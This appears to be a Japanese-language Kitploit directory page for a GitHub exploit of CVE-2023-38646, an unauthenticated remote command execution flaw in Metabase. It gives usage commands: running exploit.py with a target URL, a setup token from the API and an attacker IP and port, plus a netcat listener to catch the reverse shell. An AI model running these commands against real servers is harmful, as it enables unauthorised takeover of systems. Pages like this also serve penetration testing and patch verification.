Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-38646 — Metabase オープンソース版 0.46.6.1 より前、および Metabase エンタープライズ版 1.46.6.1 より前では、攻撃者がサーバーの権限レベルでサーバー上で任意のコマンドを実行できます。悪用に認証は不要です。その他の修正済みバージョンは、0.45.4.1、1.45.4.1、0.44.7.1、1.44.7.1、0.43.7.2、1.43.7.2 です。 | Kitploit
ツール/GitHubGitHub/junnythemarksman/cve-2023-38646
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubjunnythemarksman/cve-2023-38646

CVE-2023-38646

Metabase オープンソース版 0.46.6.1 より前、および Metabase エンタープライズ版 1.46.6.1 より前では、攻撃者がサーバーの権限レベルでサーバー上で任意のコマンドを実行できます。悪用に認証は不要です。その他の修正済みバージョンは、0.45.4.1、1.45.4.1、0.44.7.1、1.44.7.1、0.43.7.2、1.43.7.2 です。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
2年前未レビュー

CVE-2023-38646 (Metabase 事前認証RCE)

0.46.6.1 より前の Metabase オープンソース版、および 1.46.6.1 より前の Metabase Enterprise 版では、攻撃者がサーバー上でサーバーの権限レベルにて任意のコマンドを実行できます。悪用に認証は不要です。その他の修正済みバージョンは、0.45.4.1、1.45.4.1、0.44.7.1、1.44.7.1、0.43.7.2、1.43.7.2 です。

使用例

2つのターミナルを開いてください。

ターミナル 1:

python3 exploit.py -u http://vulnerablewebsite.com -t "537up-70k3n-fr0m-4p1-535510n" -i 10.10.10.10 -p 9001

root@kitploit:~
where:
-u: the URL for the vulnerable website
-t: the setup token taken from http://vulnerablewebsite.com/api/session/properties
-i: host IP address (your IP address)
-p: host port for connection 

ターミナル 2:

nc -lvnp 9001

ツールをダウンロード